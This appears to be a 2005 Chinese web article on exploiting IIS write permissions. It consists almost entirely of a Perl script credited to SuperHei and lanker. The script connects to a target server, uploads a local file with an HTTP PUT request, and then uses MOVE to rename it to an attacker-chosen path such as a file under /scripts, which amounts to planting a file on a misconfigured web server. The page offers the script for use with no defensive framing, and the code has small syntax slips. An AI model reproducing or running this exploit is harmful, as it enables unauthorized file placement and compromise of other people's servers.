对iis写权限的利用-
添加时间: 2005-5-15 20:54:15 作者: 网络收集 阅读次数:65 来源: http://www.d9soft.com
use IO::Socket;
$ARGC = @ARGV;
print "*" x 60;
print "\ncodz by ≯SuperHei<QQ:123230273> && lanker<QQ:18779569>\n";
print "*" x 60,"\n";
if ($ARGC != 4)
{
print "usage:$0 127.0.0.1 80 kaka.txt /scripts/my_file.txt\n";
exit;
}
$host = @ARGV[0];
$port = @ARGV[1];
$path = @ARGV[3];
$file = @ARGV[2];
@path=split("/",$path);
$any = pop(@path);
$path1=join("/",@path);
@s=stat("$file");
$size = $s[7];
print "$file size is $size bytes\n";
my $sock = IO::Socket::INET->new(Proto =>"tcp",
PeerAddr =>$host,
PeerPort =>$port) die "Sorry! Could not connect to $host \n";
print $sock "PUT $path1/lanker.txt HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Content-Length: $size\n\n";
open(FILE,"$file") die "Can't open $file";
binmode(FILE);
while (read(FILE,$char,1024)) {
print $sock "$char";
}
print $sock "\n\n";
@req = <$sock>;
print "please wait...\n";
sleep(2);
if ($req[4]=~/200201/){
print "upfile Succeed!!!\n" ;
}
else{
print "upfile faile!!!\n";
}
close $sock;
close FILE;
my $sock = IO::Socket::INET->new(Proto =>"tcp",
PeerAddr =>$host,
PeerPort =>$port) die "Sorry! Could not connect to $host \n";
print $sock "MOVE $path1/lanker.txt HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Destination:http://$host:$port$path\n\n\n\n";
@req = <$sock>;
if ($req[0]=~/20\d+/){
print "Modifyfile Succeed!!!" ;
}
else{
print "upfile faile!!!";
}
close $sock;
上一篇文章: Windows2000的密码破解不完全指南 下一篇文章: windowsPOSIX子系统权限提升漏洞分析以及利用(v1.0)
相关文章: